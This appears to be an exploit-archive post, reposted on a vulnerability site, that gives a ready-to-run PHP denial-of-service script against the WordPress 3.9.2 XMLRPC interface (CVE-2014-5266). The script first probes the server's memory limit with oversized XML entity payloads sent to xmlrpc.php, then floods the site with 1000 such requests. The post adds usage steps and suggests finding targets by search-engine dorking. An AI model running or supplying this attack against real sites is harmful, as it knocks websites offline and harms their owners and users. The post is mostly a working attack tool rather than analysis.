=============================================================================================================================================
| # Title : WordPress XMLRPC =============================================================================================================================================
| # Title : WordPress XMLRPC v3.9.2 Denial of Service vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.WordPress.org/ |
=============================================================================================================================================
POC :
[+] Dorking ?n Google Or Other Search Enggine.
[+] Code Description: This code performs a Denial of Service (DoS) attack against WordPress' XMLRPC interface, which had a vulnerability that was consuming server resources when sending large requests.
(Related : https://packetstorm.news/files/id/180506/ Linked CVE numbers: CVE-2014-5266 ),
[+] save code as poc.php.
[+] Set taget : Line 84.
[+] USage : php poc.php
[+] PayLoad :
<?php
class WordpressXMLRPCDoS {
private $target;
private $requestLimit;
private $defaultLimit;
private $fingerprintStep;
public function __construct($target, $requestLimit = 1000, $defaultLimit = 8, $fingerprintStep = 8) {
$this->target = $target;
$this->requestLimit = $requestLimit;
$this->defaultLimit = $defaultLimit;
$this->fingerprintStep = $fingerprintStep;
}
private function sendRequest($xml) {
$ch = curl_init($this->target . '/xmlrpc.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $xml);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: text/xml']);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $httpCode;
}
private function fingerprint() {
$memoryToUse = $this->fingerprintStep;
while ($memoryToUse < 1024) {
echo "Trying memory limit {$memoryToUse}MB\n";
$xml = $this->generateXML($memoryToUse);
$responseCode = $this->sendRequest($xml);
if ($responseCode == 500) {
$lastLimit = $memoryToUse - $this->fingerprintStep;
echo "Got an error - using limit {$lastLimit}MB\n";
return $lastLimit;
}
$memoryToUse += $this->fingerprintStep;
}
echo "Cannot determine limit, using default of {$this->defaultLimit}MB\n";
return $this->defaultLimit;
}
private function generateXML($size) {
$entity = bin2hex(random_bytes(2));
$doctype = bin2hex(random_bytes(3));
$param1 = bin2hex(random_bytes(3));
$param2 = bin2hex(random_bytes(3));
$sizeBytes = $size * 1024;
$xmlTemplate = "<?xml version='1.0' encoding='ISO-8859-1'?>"
. "<!DOCTYPE {$doctype} ["
. "<!ENTITY {$entity} '" . str_repeat('A', $sizeBytes) . "'>]"
. "<methodCall>"
. "<methodName>&{$entity};</methodName>"
. "<params>"
. "<param><value>{$param1}</value></param>"
. "<param><value>{$param2}</value></param>"
. "</params></methodCall>";
return $xmlTemplate;
}
public function run() {
echo "Fingerprinting memory limit...\n";
$size = $this->fingerprint();
echo "Using {$size}MB as memory limit\n";
$xml = $this->generateXML($size);
for ($i = 1; $i <= $this->requestLimit; $i++) {
echo "Sending request #{$i}...\n";
$this->sendRequest($xml);
}
}
}
$target = "http://example.com"; // ?? ??? ???? ?????
$attack = new WordpressXMLRPCDoS($target);
$attack->run();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
WordPress XMLRPC 3.9.2 Denial of Service
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 25